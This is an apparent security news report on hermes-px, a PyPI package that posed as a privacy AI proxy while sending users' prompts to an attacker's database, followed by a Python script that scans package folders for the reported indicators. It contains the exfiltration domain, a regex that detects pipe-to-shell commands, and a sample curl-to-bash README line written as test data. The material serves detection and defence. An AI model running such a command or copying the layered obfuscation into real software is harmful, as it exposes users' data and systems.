A recently uncovered Python package on PyPI poses a significant threat by masquerading as a privacy-focused AI tool while secretly exfiltrating user data. This package, named hermes-px, advertised itself as a ‘Secure AI Inference Proxy’ that routed AI requests through the Tor network to ensure user anonymity. However, it was found to be collecting sensitive information without users’ knowledge.
Deceptive Package Targeting Developers
The hermes-px package was particularly insidious due to its convincing presentation. It included comprehensive documentation, installation guides, and code samples, making it appear legitimate to developers seeking a free privacy-forward AI solution. Researchers from JFrog Security, led by Guy Korolevski, identified the package on April 5, 2026, revealing its deceptive nature.
The package was designed to appeal to software developers working with AI models, offering what seemed to be an easy-to-use alternative to paid SDKs. Once integrated into a project, it silently logged every prompt sent by developers, funneling the data to an attacker-controlled Supabase database. The package’s README file included instructions to execute a script from a GitHub URL, providing a secondary channel for delivering malicious payloads.
Exposing User Data and Bypassing Tor
The impact of this package extended beyond simple data collection. Users were unwittingly drawing on the AI infrastructure of Universite Centrale in Tunisia without consent. Despite promising anonymity via the Tor network, the package bypassed Tor and used direct internet connections, exposing users’ real IP addresses.
At the core of the attack was a file called base_prompt.pz, which contained a copy of Anthropic’s Claude Code system prompt. The attacker attempted to disguise it by renaming references to Claude and Anthropic, yet some original markers remained. This stolen prompt, coupled with encrypted payloads mimicking university chatbot instructions, was injected into every API call.
Security Measures and Recommendations
The package employed a three-layer obfuscation strategy to shield its malicious components from detection. Sensitive strings were encrypted, compressed, and base64-encoded, making standard string-based analysis ineffective. Users who installed hermes-px should immediately uninstall it using pip uninstall hermes-px and rotate any exposed credentials.
Security experts recommend reviewing all communications passed through the package for any sensitive information. Blocking the exfiltration endpoint at urlvoelpilswwxkiosey[.]supabase[.]co is essential. Additionally, removing Tor installations related to this package can help reduce exposure to similar threats in the future.
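As an added example, not code from the report or from JFrog, the following Python script triages an unpacked package directory for the indicators described above: the defanged Supabase endpoint, a README line that pipes a remote script into a shell, a bundled base_prompt.pz file, and long base64 strings that either inflate with zlib or decode to high-entropy bytes, which is what the layered encrypt/compress/base64 wrapping looks like from the outside. The report does not say in which order the encryption and compression layers were applied, so the blob check accepts either. It also checks whether hermes-px is present via importlib.metadata. The sample package it builds is constructed for the demonstration (placeholder URL, synthetic blobs) so the scan runs offline.

```python
import base64
import binascii
import hashlib
import math
import os
import re
import tempfile
import zlib
from collections import Counter
from dataclasses import dataclass
from importlib import metadata

# Indicator from the report, defanged there; refanged here only so it can be matched.
EXFIL_DOMAIN = "urlvoelpilswwxkiosey[.]supabase[.]co".replace("[.]", ".")
# Runs of base64 alphabet long enough to be a wrapped payload rather than an identifier.
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# README instruction that fetches a remote script and pipes it straight into a shell
# (assumed form of the "execute a script from a GitHub URL" instruction).
PIPE_TO_SHELL_RE = re.compile(
    r"(?:curl|wget)[^\n|]*https?://[^\s|]+[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
)
TEXT_SUFFIXES = (".py", ".md", ".rst", ".txt", ".pz", ".cfg", ".toml", ".json")


@dataclass
class Finding:
    path: str
    kind: str
    detail: str


def installed_location(dist_name: str):
    """Install directory of a distribution, or None if it is not installed."""
    try:
        return str(metadata.distribution(dist_name).locate_file(""))
    except metadata.PackageNotFoundError:
        return None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or random data approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_blob(candidate: str):
    """Peel the base64 layer and report what sits underneath, if it looks wrapped."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except binascii.Error:
        return None
    try:
        zlib.decompress(raw)
        return "base64-wrapped-zlib"  # a compressed layer sits directly under base64
    except zlib.error:
        pass
    # Entropy of a short sample cannot exceed log2(len), so scale the bar to the size.
    if len(raw) >= 64 and shannon_entropy(raw) >= 0.85 * min(8.0, math.log2(len(raw))):
        return "base64-wrapped-high-entropy"  # likely encrypted, or compressed then encrypted
    return None


def scan_text(path: str, text: str):
    findings = []
    if EXFIL_DOMAIN in text:
        findings.append(Finding(path, "exfil-endpoint", EXFIL_DOMAIN))
    for m in PIPE_TO_SHELL_RE.finditer(text):
        findings.append(Finding(path, "pipe-to-shell", m.group(0)[:100]))
    for m in B64_RE.finditer(text):
        kind = classify_blob(m.group(0))
        if kind:
            findings.append(Finding(path, kind, f"{len(m.group(0))} chars at offset {m.start()}"))
    return findings


def scan_directory(root: str):
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if name == "base_prompt.pz":  # bundled prompt payload named in the report
                findings.append(Finding(path, "bundled-prompt-file", name))
            if name.endswith(TEXT_SUFFIXES):
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        findings.extend(scan_text(path, fh.read()))
                except OSError:
                    continue
    return findings


def build_sample_package() -> str:
    """Constructed stand-in for an unpacked package; not the real hermes-px files."""
    root = tempfile.mkdtemp(prefix="pkg-triage-")
    compressed = base64.b64encode(zlib.compress(bytes(range(256)) * 3)).decode()
    # Deterministic high-entropy bytes stand in for a ciphertext blob.
    cipher_like = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))
    with open(os.path.join(root, "client.py"), "w") as fh:
        fh.write(f'ENDPOINT = "https://{EXFIL_DOMAIN}/rest/v1/log"\n')
        fh.write(f'PAYLOAD_A = "{compressed}"\n')
        fh.write(f'PAYLOAD_B = "{base64.b64encode(cipher_like).decode()}"\n')
    with open(os.path.join(root, "README.md"), "w") as fh:
        fh.write("Setup:\n\n    curl -sSL https://github.com/example-org/placeholder/setup.sh | bash\n")
    open(os.path.join(root, "base_prompt.pz"), "wb").close()
    return root


if __name__ == "__main__":
    print("hermes-px installed at:", installed_location("hermes-px"))
    for f in scan_directory(build_sample_package()):
        print(f"{f.kind:28} {f.path}  {f.detail}")
```

Point scan_directory at the real site-packages directory of the package (the path installed_location returns) to triage an actual install; the high-entropy rule will also flag legitimate embedded binary data such as images, so treat its hits as candidates for manual review rather than verdicts.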
